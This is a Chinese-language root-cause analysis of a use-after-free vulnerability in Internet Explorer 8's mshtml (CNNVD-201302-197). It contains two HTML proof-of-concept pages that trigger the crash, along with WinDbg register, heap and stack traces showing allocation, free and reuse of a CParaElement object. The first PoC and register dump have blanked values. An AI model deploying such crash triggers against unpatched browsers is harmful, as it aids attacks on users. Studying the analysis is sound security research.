Microsoft IE ‘SLayoutRun’释放后重用漏洞(CNNVD-201302-197)
Microsoft Internet Explorer是微软Windows操作系统中默认捆绑的WEB浏览器。
Microsoft Internet Explorer 8中的SLayoutRun中存在释放后重用漏洞。通过特制网站触发对已删除对象的访问,远程攻击者可利用该漏洞执行任意代码。
测试环境
Windows7
IE 8.0.7600.16385
poc代码如下
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(,);
document.body.style.whiteSpace = "pre-line";
setTimeout("document.body.innerHTML = 'i'",);
</script>
</body>
</html>
:> r
eax=1ca0afb0 ebx=0411e8d8 ecx= edx= esi=1ceaefd8 edi=1ceaefd8
eip= esp=0411e84c ebp=0411e84c iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!ElementWantsNotification+0x5:
f7461c00000008 test dword ptr [esi+1Ch],8000000h ds::1ceaeff4=????????
:> !heap -p -a esi
address 07620fd8 found in
_DPH_HEAP_ROOT @ 1a1000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
75e06e8:
6fcd90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
ntdll!RtlDebugFreeHeap+0x0000002f
77857aca ntdll!RtlpFreeHeap+0x0000005d
77822d68 ntdll!RtlFreeHeap+0x00000142
771af1ac kernel32!HeapFree+0x00000014
6a2a930e mshtml!operator delete[]+0x00000016
6a318c8d mshtml!CParaElement::`vector deleting destructor'+0x0000001f
6a2b7dd0 mshtml!CBase::SubRelease+0x00000022
6a310fdf mshtml!CElement::PrivateExitTree+0x00000011
6a1f5b42 mshtml!CMarkup::SpliceTreeInternal+0x00000083
6a1f6ff9 mshtml!CDoc::CutCopyMove+0x000000ca
6a1f6f39 mshtml!CDoc::Remove+0x00000018
6a1f6f17 mshtml!RemoveWithBreakOnEmpty+0x0000003a
6a1f7aef mshtml!InjectHtmlStream+0x00000191
6a1f793e mshtml!HandleHTMLInjection+0x0000005c
6a1f71fa mshtml!CElement::InjectInternal+0x00000307
6a1f704a mshtml!CElement::InjectCompatBSTR+0x00000046
6a1f988c mshtml!CElement::put_innerHTML+0x00000040
6a3372d6 mshtml!GS_BSTR+0x000001ac
6a32235c mshtml!CBase::ContextInvokeEx+0x000005dc
6a32c75a mshtml!CElement::ContextInvokeEx+0x0000009d
6a32c79a mshtml!CInput::VersionedInvokeEx+0x0000002d
6a2d3104 mshtml!PlainInvokeEx+0x000000eb
6c75a22a jscript!IDispatchExInvokeEx2+0x00000104
6c75a175 jscript!IDispatchExInvokeEx+0x0000006a
6c75a3f6 jscript!InvokeDispatchEx+0x00000098
6c75a4a0 jscript!VAR::InvokeByName+0x00000139
6c76d8c8 jscript!VAR::InvokeDispName+0x0000007d
6c759c0e jscript!CScriptRuntime::Run+0x0000208d
6c765c9d jscript!ScrFncObj::CallWithFrameOnStack+0x000000ce
6c765bfb jscript!ScrFncObj::Call+0x0000008d
6c765e11 jscript!CSession::Execute+0x0000015f
重利用:
1:023> r
eax=1ca0afb0 ebx=0411e8d8 ecx=00000000 edx=10001000 esi=1ceaefd8 edi=1ceaefd8
eip=65477386 esp=0411e84c ebp=0411e84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
65477386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:1ceaeff4=????????
分配:
1:021> g
Breakpoint 2 hit
eax=077e6fd8 ebx=07cfefd0 ecx=7721349f edx=00000000 esi=077e6fd8 edi=07d59f70
eip=6830480f esp=0440f4a4 ebp=0440f4b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CElement::CElement:
6830480f 8bff mov edi,edi
1:021> dd eax
077e6fd8 00000000 00000000 00000000 00000000
077e6fe8 00000000 00000000 00000000 00000000
077e6ff8 00000000 00000000 ???????? ????????
077e7008 ???????? ???????? ???????? ????????
077e7018 ???????? ???????? ???????? ????????
077e7028 ???????? ???????? ???????? ????????
077e7038 ???????? ???????? ???????? ????????
077e7048 ???????? ???????? ???????? ????????
1:021> kv
ChildEBP RetAddr Args to Child
0440f4a0 68322dbf 0000004d 05832680 0440f4c4 mshtml!CElement::CElement
0440f4b0 68327e98 0000004d 05832680 07cfef08 mshtml!CBlockElement::CBlockElement+0x12
0440f4c4 68304be9 07d59f70 05832680 0440f500 mshtml!CParaElement::CreateElement+0x26
0440f4f0 68308961 0440f524 07a04f30 00000000 mshtml!CreateElement+0x43
0440f51c 68306e93 00000000 071fafb0 07d59f70 mshtml!CHtmParse::ParseBeginTag+0xe3
0440f538 683075c9 7710ef76 071fafb0 071fafb0 mshtml!CHtmParse::ParseToken+0x82
0440f5e0 682f78e8 071fafb0 0af194c6 0af194c6 mshtml!CHtmPost::ProcessTokens+0x237
0440f6a4 682f8a99 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Exec+0x221
0440f6bc 682f89fd 0af194c6 00000000 071fafb0 mshtml!CHtmPost::Run+0x15
0440f6dc 682f7c66 057e4d58 0af194c6 071fafb0 mshtml!PostManExecute+0x1fb
0440f6f8 683113f6 00000001 00000007 0440f718 mshtml!PostManResume+0xf7
0440f708 682f53fc 07d06f98 071fafb0 0440f74c mshtml!CHtmPost::OnDwnChanCallback+0x10
0440f718 683994b2 07d06f98 00000000 057e4d58 mshtml!CDwnChan::OnMethodCall+0x19
0440f74c 683837f7 0440f7e8 00008002 00000000 mshtml!GlobalWndOnMethodCall+0xff
0440f76c 76c686ef 004c0314 00000008 00000000 mshtml!GlobalWndProc+0x10c
0440f798 76c68876 68371de3 004c0314 00008002 USER32!InternalCallWinProc+0x23
0440f810 76c689b5 00000000 68371de3 004c0314 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])
0440f870 76c68e9c 68371de3 00000000 0440f8f8 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])
0440f880 6ea704a6 0440f898 00000000 017ecf58 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])
0440f8f8 6ea80446 04fba808 00000000 02f40ff0 IEFRAME!CTabWindow::_TabWindowThreadProc+0x452 (FPO: [Non-Fpo])
释放:
(68327ec0) mshtml!CParaElement::`vftable' | (68328169) mshtml!CStyleSelector::SetSelectorPart
Exact matches:
mshtml!CParaElement::`vftable' = <no type information>
ChildEBP RetAddr Args to Child
0438eddc 68387db6 0791cf30 00000000 0438ef48 mshtml!CBase::SubRelease (FPO: [0,0,0])
0438edec 683e0fdf 07f2afd8 00000000 682c660e mshtml!CBase::PrivateRelease+0x3c
0438edf8 682c660e 0791cf30 00000000 00000018 mshtml!CElement::PrivateExitTree+0x11 (FPO: [0,0,1])
0438ef48 682c5b42 0438f06c 0438efbc 00000000 mshtml!CSpliceTreeEngine::RemoveSplice+0x841
0438f028 682c6ff9 0438f060 0438f06c 00000000 mshtml!CMarkup::SpliceTreeInternal+0x83
0438f078 682c6f39 0438f220 0438f25c 00000001 mshtml!CDoc::CutCopyMove+0xca
0438f094 682c6f17 0438f220 0438f25c 00000000 mshtml!CDoc::Remove+0x18
0438f0ac 682c7aef 0438f25c 07b70e74 683791b8 mshtml!RemoveWithBreakOnEmpty+0x3a
0438f1a8 682c793e 0438f220 0438f25c 0438f1d0 mshtml!InjectHtmlStream+0x191
0438f1e4 682c71fa 0438f220 0438f25c 00000002 mshtml!HandleHTMLInjection+0x5c
0438f29c 682c704a 00000000 00000001 07b70e74 mshtml!CElement::InjectInternal+0x307
0438f2b8 682c988c 05680fd0 00000000 00000001 mshtml!CElement::InjectCompatBSTR+0x46
0438f2d8 684072d6 00680fd0 07b70e74 07b7ffd0 mshtml!CElement::put_innerHTML+0x40
0438f308 683f235c 05680fd0 07b7ffd0 07039fd8 mshtml!GS_BSTR+0x1ac
0438f37c 683fc75a 05680fd0 80010402 00000002 mshtml!CBase::ContextInvokeEx+0x5dc
0438f3cc 683fc79a 05680fd0 80010402 00000002 mshtml!CElement::ContextInvokeEx+0x9d
0438f3f8 683a3104 05680fd0 80010402 00000002 mshtml!CInput::VersionedInvokeEx+0x2d
0438f44c 6bcfa22a 06b12fd8 80010402 00000002 mshtml!PlainInvokeEx+0xeb
0438f488 6bcfa175 07328d10 80010402 00000409 jscript!IDispatchExInvokeEx2+0x104
0438f4c4 6bcfa3f6 07328d10 00000409 00000004 jscript!IDispatchExInvokeEx+0x6a
(96c.c6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07912fb0 ebx=0438edb8 ecx=00000000 edx=10001000 esi=07f2afd8 edi=07f2afd8
eip=68387386 esp=0438ed2c ebp=0438ed2c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:07f2aff4=????????
尝试对应到js语句中
修改POC
<!doctype html>
<html>
<head></head>
<body>
<p> </p>
<script>
Math.tan(2,3);
document.body.style.whiteSpace = "pre-line";
Math.sin(0);
setTimeout("document.body.innerHTML = 'i'",100);
Math.cos(0);
</script>
</body>
</html>
UAF元素CParaElement是由
<p> </p>
导致创建的
1:020> g
Breakpoint 1 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d8c0 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!tan:
6be7d8c0 ff258010e56b jmp dword ptr [jscript!_imp__tan (6be51080)] ds:0023:6be51080={msvcrt!tan (758dde34)}
1:020> g
Breakpoint 3 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d711 esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!sin:
6be7d711 ff256810e56b jmp dword ptr [jscript!_imp__sin (6be51068)] ds:0023:6be51068={msvcrt!sin (758d8aea)}
1:020> g
Breakpoint 2 hit
eax=00000000 ebx=0423ee08 ecx=00000005 edx=00000003 esi=0423edf8 edi=0423edf8
eip=6be7d67f esp=0423ecf4 ebp=0423ed30 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
jscript!cos:
6be7d67f ff259010e56b jmp dword ptr [jscript!_imp__cos (6be51090)] ds:0023:6be51090={msvcrt!cos (758d8ace)}
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=06cd5b88 ebx=00000000 ecx=0792afd8 edx=686f5100 esi=07020fd0 edi=00000384
eip=68387d27 esp=0423df4c ebp=0423df60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=00000010
1:020> g
eax=00000043 ebx=00000000 ecx=0792afd8 edx=00000000 esi=0792afd8 edi=00000000
eip=68387d27 esp=0423e8f8 ebp=0423e904 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mshtml!CBase::SubRelease:
68387d27 834108f8 add dword ptr [ecx+8],0FFFFFFF8h ds:0023:0792afe0=0000000a
1:020> g
(6b0.f20): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=079d2fb0 ebx=0423e8d0 ecx=00000000 edx=10001000 esi=0792afd8 edi=0792afd8
eip=68387386 esp=0423e844 ebp=0423e844 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
mshtml!ElementWantsNotification+0x5:
68387386 f7461c00000008 test dword ptr [esi+1Ch],8000000h ds:0023:0792aff4=????????
释放可以根据回溯中的CElement::put_innerHTML分析得出是POC的document.body.innerHTML = 'i'所导致
没有明显的js语句对应于重用
漏洞原因分析
这个漏洞的成因在于CTreeNode没有被释放存在有CParaElement对象的悬垂指针,而CTreeNode没有被释放的原因在于被CTreeDataPos对象错误的引用。